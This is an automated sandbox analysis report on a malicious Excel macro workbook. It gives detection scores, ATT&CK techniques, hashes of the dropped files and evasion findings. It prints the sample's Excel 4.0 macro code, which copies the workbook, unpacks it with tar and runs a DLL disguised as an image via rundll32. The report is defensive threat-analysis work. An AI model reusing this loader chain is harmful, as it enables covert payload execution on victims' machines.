Analysis Report 4468873941_759979693.xlsm
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Networking: |
---|
Yara detected MalDoc1 | Show sources |
Source: | File source: |
Source: | File created: | Jump to behavior |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Dropped File: |
Source: | Binary string: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Window title found: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion: |
---|
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) | Show sources |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading11 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 412575 |
Start date: | 12.05.2021 |
Start time: | 19:33:01 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 4468873941_759979693.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.troj.expl.evad.winXLSM@1/9@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185386 |
Entropy (8bit): | 7.326521161282199 |
Encrypted: | false |
SSDEEP: | 3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8 |
MD5: | A6E3680B30CEC6746291E55B7D9B6975 |
SHA1: | E45C3A057F840EF4C96AB8233E1E21700BBDA199 |
SHA-256: | 89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261 |
SHA-512: | FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 647168 |
Entropy (8bit): | 6.903949816811106 |
Encrypted: | false |
SSDEEP: | 12288:uRgaHm2fjIxEh+bLlmTlEPMx4rBjVXmePxfH3KYypHKlA:2gim2fMOh+mF4NUmKYy0lA |
MD5: | C77E025AB5500D3A00B86265C73CC0B3 |
SHA1: | 83B5715406E67F33E0030C2F17991A4D4BE2CBE5 |
SHA-256: | D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803 |
SHA-512: | BCB03E9EA06A3957D3D9C032BC10B93443ED76E102FDB147B0414BA0D60F57FFD429D5B42B8878A70D1AC5A79AF9E6F8B635574E7731D3AB9BB8248CF43A8DC3 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892547340909964 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq |
MD5: | D6657AA638C3DF2BF427C21C278E328B |
SHA1: | CEFF78E927887AAD7987AC84124346E53F38F2C3 |
SHA-256: | 23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A |
SHA-512: | 693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.493322303689225 |
Encrypted: | false |
SSDEEP: | 48:8K/XT0jFD2ohH0tQh2K/XT0jFD2ohH0tQ/:8K/XojFD2C0tQh2K/XojFD2C0tQ/ |
MD5: | C21BE05514D07B27D3EF61D140FC382B |
SHA1: | 8C047B383BD5B39989F20719AF63A2451A50209B |
SHA-256: | 4FC18FCA7B8D2BDAA7F6D6FB1BAD00BA37287048E13CDB1838610F1DDB504A2F |
SHA-512: | F8317EDBCB611E4C1A39F913DECE1FA3179786D804DEB11751DCE96BFFE05AFD625133039425EA426C134DD39CF87D819C68D9EE907DCF323E72C2E2C1981411 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.472696730816663 |
Encrypted: | false |
SSDEEP: | 12:85QZCcLgXg/XAlCPCHaXtB8XzB/qPX+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJP9O:85xK/XTd6jgYe11CDv3qtrNru/ |
MD5: | B2CD84427A7343276563C7B2D120731B |
SHA1: | 70AD4C54B28C1000672AADBEE0B1D151CCFAE511 |
SHA-256: | 542A74682ED4998B3ED2FC981EA9C34C460385D8FB6CCA7983EC28578821D0BC |
SHA-512: | 5AC5D4D32E28A121915AFF1132A2F947EF42833BC1815F5C8E95C9C54B7C89A41F8961FFB5C0D7526E374B4C23B51D91AECCA6D154B6BCCF41A71F42889306F9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.495660190158482 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWa7DOccLpS7fDOccLpSmxWa7DOccLpSv:djzCkCBCc |
MD5: | A9FD717C784D3A26BA547741BB6304EE |
SHA1: | 63FB9EB70A5C91C2B1CE15B7384725835620929A |
SHA-256: | 7F77C3AC0D59D1431C42221F62F9AA99D68724A477F92FF396058F18FF320B11 |
SHA-512: | A60F9DD8104335863122E4A9EF9FF7FF4457AC49B72DA74B1C6991A0E7BCF31658ED0F4BA1B4BFD8747DB3CA2C408BC2002C3B2B2176B86B00BA2569AF020A4E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892547340909964 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq |
MD5: | D6657AA638C3DF2BF427C21C278E328B |
SHA1: | CEFF78E927887AAD7987AC84124346E53F38F2C3 |
SHA-256: | 23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A |
SHA-512: | 693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892547340909964 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKq:4KVbLte52a2GZFGaycOucCsGqaq |
MD5: | D6657AA638C3DF2BF427C21C278E328B |
SHA1: | CEFF78E927887AAD7987AC84124346E53F38F2C3 |
SHA-256: | 23FB2FF8147C23916DF687EB4DCFD6CE6309250EE6F0643DA56E7DFE18A1D89A |
SHA-512: | 693B4EBF60A5C25A2BB469EDAF0CFE2803EF1F13CC2AF9D59B40537C264F9D100108139CA12C3D203FBB842E2B994A410440515F6A6CEC722C21380F4CF5765B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.891710388965609 |
TrID: |
|
File name: | 4468873941_759979693.xlsm |
File size: | 607568 |
MD5: | b5021bc6cc8e2fc2231978d6c9118f2a |
SHA1: | c11430e1206f25bf768f1643f51bed8a4a1eec9d |
SHA256: | 5600e318bd25cb62a710d880649b11c4d85ae6f8ee5c2084a9d819a16abcd3b2 |
SHA512: | e4bd8a7522c45ecf9ed9d19cd0ba4fcc66669f3ec1d1f5539ca35418844926c1f3a8285de1f4d00e7c881be313e0916b462aa3809c44c5e910b1edef9d0eadfb |
SSDEEP: | 12288:ppex0VbLbGeH+59SjNGst3hglv595+6tLAJVX0cfxBNtsY69bWed0t:pUKVbLte52dt3i/+mAJ2gsY6oe2 |
File Content Preview: | PK..........!.........3.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "4468873941_759979693.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,"=SAVE.COPY.AS(""..\Nioka.meposv"")",run,,,,,,,dll32 ..\xl\media\im,,,,,,"=EXEC(""tar -xf ..\Nioka.meposv -C ..\"")=PI()=PI()=PI()","age2.bmp,StartW",,,,,,,,,,,,,,,,,,,,"=WAIT(NOW()+""00:00:06"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=PI()=PI()=PI()=EXEC(AL701&AL702&AL703)=PI()=PI()=PI(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 19:33:37 |
Start date: | 12/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fc00000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|